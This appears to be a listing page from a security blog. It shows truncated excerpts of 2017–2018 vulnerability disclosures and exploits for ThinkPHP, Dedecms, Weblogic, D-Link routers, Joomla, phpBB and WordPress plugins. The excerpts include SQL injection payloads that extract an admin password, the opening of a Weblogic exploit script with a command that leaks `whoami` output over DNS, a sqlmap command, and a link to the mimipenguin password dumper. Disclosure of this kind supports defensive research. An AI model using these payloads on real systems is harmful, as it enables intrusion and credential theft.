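• thinkphp3.2.3 Injection Vulnerability

    This vulnerability arises in an application developed on thinkphp3.2.3. Vulnerability 1: Because the oauth_reg method calls login to verify whether the current member is logged in, we need to register a member account before exploiting the vulnerability. Here I register an account whose username and password are both test123, then construct the following cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 mem...
    Author: unhonker | Published: March 5, 2018 | Category: Vulnerability Disclosures | Views: 1,178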
  • Dedecms Arbitrary User Login

    ## Front-end login as an arbitrary user global $dsql; if($kptime==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kptime; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE;...
    Author: unhonker | Published: January 23, 2018 | Category: Vulnerability Disclosures | Views: 877
  • Weblogic (CVE-2017-10271) Vulnerability Exp

    Article author: 莫须有 Command format: python3 CVE-2017-10271.py url command e.g.: python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on December 23, 2017 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) ...
    Author: unhonker | Published: December 27, 2017 | Category: Vulnerability Disclosures | Views: 1,928
  • D-Link DIR8xx Remote Code Execution Vulnerability

    Script download: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
    Author: unhonker | Published: September 16, 2017 | Category: Vulnerability Disclosures | Views: 1,750
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: Wi...
    Author: unhonker | Published: August 29, 2017 | Category: Vulnerability Disclosures | Views: 1,525
  • phpBB 3.2.0 Server Side Request Forgery

    title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
    Author: unhonker | Published: August 7, 2017 | Category: Vulnerability Disclosures | Views: 2,143
  • WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

    # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST['CatID'] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...
    Author: unhonker | Published: June 28, 2017 | Category: Vulnerability Disclosures | Views: 3,197
  • WordPress Huge-IT Video Gallery 2.0.4 SQL Injection

    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    Author: unhonker | Published: May 30, 2017 | Category: Vulnerability Disclosures | Views: 2,684
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The GET parameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    Author: unhonker | Published: April 26, 2017 | Category: Vulnerability Disclosures | Views: 2,885
  • mimipenguin, a Password-Dumping Tool for Linux

    Download: https://github.com/huntergregal/mimipenguin Requires root privileges. Tested successfully in the following environments: Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    Author: unhonker | Published: April 6, 2017 | Category: Personal Interests | Views: 2,467